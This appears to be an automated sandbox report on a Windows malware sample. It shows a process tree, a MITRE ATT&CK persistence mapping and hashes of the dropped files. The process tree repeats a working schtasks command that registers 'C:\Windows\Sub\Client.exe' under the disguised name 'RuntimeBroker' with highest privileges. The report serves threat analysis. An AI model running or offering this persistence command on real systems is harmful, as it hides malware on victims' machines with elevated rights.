C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:5056
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3184
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:4816
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4084
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:4080
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4412
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2324
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:4932
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:1584
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:3316
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3356
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:5108
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3964
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:4860
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:2704
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:1140
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:212
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2216
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:612
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2976
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:2412
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2708
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4680
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:4176
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3932
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:4816
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:1508
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:1992
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4412
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:4940
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:752
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2092
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4344
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:3908
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3204
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:5020
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:116
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:2904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:1400
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:712
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:1836
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:3236
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:1704
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:3968
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3356
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:1488
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4084
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:3964
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3528
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:5072
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:2076
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:1420
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:2536
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:4968
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit8⤵PID:1500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST9⤵
- Creates scheduled task(s)
PID:3316
-
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
948B
MD5c9b6705519e1eef08f86c4ba5f4286f3
SHA16c6b179e452ecee2673a1d4fe128f1c06f70577f
SHA2560f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705
SHA5126d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD5dfefa0b2348e2bf802d24eb6f316cf1f
SHA1259864d4720c10a015b8f69996bcaeaeeaa2b0a6
SHA2564c7b8b3ad7acb305c9cd857d715db10f83f27e31011693e18ade9b7ec8a5934d
SHA512d68da96e873ebb28e8131cbbfb031bdc7c39598734bc02b8feb365579f96b50eb692fa8e955c9c1444b01d7775a1f7e5125a8254e45cea3c64e63c0e0a115037
-
Filesize
1KB
MD5c84d323a1972e30971e8535cb51648ab
SHA1ade49fa62de6a92be9f8d869c039cb4449537809
SHA256b6f9bea53be6ed16a77930454b3f1f1c0db0ee5d34f539c4c51263f8adbc7743
SHA512b0cc02f7ebb086474488b6a7ac0da6591ce4a495a4ea0bbd67af720198f1e1d2e2baebe49eee52faa911adc3425bc0a6de7d18870f2daf6c9ad8c4ccf168fb7e
-
Filesize
1KB
MD5db516858bc7d44d795f3db27e4727215
SHA1641935cf474bc80e5639d4ee7ecde6c49f8437e0
SHA256ee52dc7a60da00f667c711173c0d8631a3f7fb4c00e7c8f93c1f075d2c5ff805
SHA512113f3ac6be9ef113d201b1a8476cf1d02cf8292d52f9550670988cf17b0b679c691f7703a250469bf00cc1a3d4819ffb255677ffea2883b8329860e94f88cc60
-
Filesize
594KB
MD558a2609f4f86e63089934ba0bab2ced9
SHA1a4a7bca4a74ece9b0a2ba7c77e2dd25e53be2bea
SHA256e2198f144eb66741b9aaffe44d5886cd80548602495a719f5a5b34ba3e12c8d6
SHA512c6a7ad6b0d3a65eba5401fe0793bc12c8f5b00fcc48739401cb0988153ca4f43c34e8bc580d3c52edf1197d73e097ed95b455918b2551cdeb8ee35a81ecc486d
-
Filesize
733KB
MD5ab7ca8b87249457d23cd632d21183dfc
SHA1d234f7e75f972baa135ab8505e44fcd478c04447
SHA256e1437b2de1ccd08aab8f31532cf8109afdb84782c8927f3feeea25ba6be10c6e
SHA512cd70a7400bc54bbcdb9c6c113e4785a7d3025a740415de997168d184950e874bc4b0c73448facdc89c8afbbdeef6b26deff703f19494bb56bf504d922f17dfa2
-
Filesize
101KB
MD50593b521f3e8af295d523ea480388b0f
SHA139fc9ab8b8663801319557b06defb2a50e0c5d08
SHA2563247a643a33c091fe826b3ce8e5e9524c5863e3c71eb9168f1bf52520742a8b9
SHA512adc9c7875965c06fda648dce41975e1a7b7ef44b233a20efdebeae61e8b99c8e2cf809112cf3e4c1aaf00a2d1dd5c39a0be68541782aea9cbe87f12044c81b6d
-
Filesize
229KB
MD5f4e8be6083edefb0d64e02b0fb5d1871
SHA1ae63421a26e2f149f499f7153fd27109718f4cd2
SHA2567db00186278b889396e94458ad13c6703b7ac7bcb2d78b9ef6852511309d5832
SHA51212062389ae759edf9fb8311f919f6db15e018fdcbf3acc0ddca181a593c5a2048ebf3a4dfbec61e1818e9df2ed8e9c3e8f099e13594bb0bcf351d5bd175ebdaa
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
115B
MD58ee7d2a02a6ff2d2da40fb8bde563057
SHA15149f4e9b5bd770bf6232ca148d8cb24336cfecd
SHA256bd95bdda5f58ec4bb3457ec70052ad4158aba496abb775a5a6740dc750870a7b
SHA512356c9a3b89d4c5d07105e0f643e7c6e6847c7c44ad8c81f926bec0f180736062c2b47f2d14f1110a3210208cedeb896c91532d66edf85defa9aae2ce7a1ea860
-
Filesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6